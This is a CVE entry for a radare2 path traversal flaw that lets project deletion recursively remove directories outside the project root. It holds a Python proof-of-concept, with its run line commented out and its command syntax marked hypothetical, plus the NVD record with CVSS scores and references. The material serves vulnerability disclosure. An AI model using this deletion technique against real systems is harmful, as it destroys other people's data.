CVE-2026-6940

#!/usr/bin/env python3 # PoC for CVE-2026-6940: radare2 Path Traversal in Project Deletion import os import subprocess # Create a target directory to simulate sensitive data target_dir = "/tmp/sensitive_data_cve_2026_6940" os.makedirs(target_dir, exist_ok=True) print(f"[+] Created target directory: {target_dir}") # Create a fake radare2 project marker file inside the target directory # radare2 looks for project files to identify what to delete marker_path = os.path.join(target_dir, ".project_marker") with open(marker_path, 'w') as f: f.write("fake_project_data") print(f"[+] Created marker file: {marker_path}") # Simulate the vulnerable behavior: # Invoking radare2 with a command that triggers project deletion # using an absolute path outside the allowed project root. # Note: Exact command syntax depends on radare2 usage, typically # involves 'Pd' (Project delete) or similar internal commands. # In a real scenario, this might be triggered via a crafted file opening # that forces r2 to clean up a project path defined by the attacker. # Example command structure (Hypothetical based on vuln description): cmd = ["r2", "-c", f"Pd {target_dir}", "/bin/ls"] print(f"[*] Attempting to trigger deletion via: {' '.join(cmd)}") # subprocess.run(cmd) # Commented out to prevent accidental deletion on analysis system print("[+] If vulnerable, the directory would be deleted recursively.")

{"cve": {"id": "CVE-2026-6940", "sourceIdentifier": "[email protected]", "published": "2026-04-23T21:16:06.640", "lastModified": "2026-04-27T14:56:28.570", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "radare2 prior to 6.1.4 contains a path traversal vulnerability in project deletion that allows local attackers to recursively delete arbitrary directories by supplying absolute paths that escape the configured dir.projects root directory. Attackers can craft absolute paths to project marker files outside the project storage boundary to cause recursive deletion of attacker-chosen directories with permissions of the radare2 process, resulting in integrity and availability loss."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:radare:radare2:*:*:*:*:*:*:*:*", "versionEndExcluding": "6.1.4", "matchCriteriaId": "FEDC34E8-8476-44C6-A73A-D9CF18F12844"}]}]}], "references": [{"url": "https://github.com/radareorg/radare2/pull/25830", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://github.com/radareorg/radare2/pull/25830/commits", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://www.vulncheck.com/advisories/radare2-project-deletion-path-traversal-directory-deletion", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}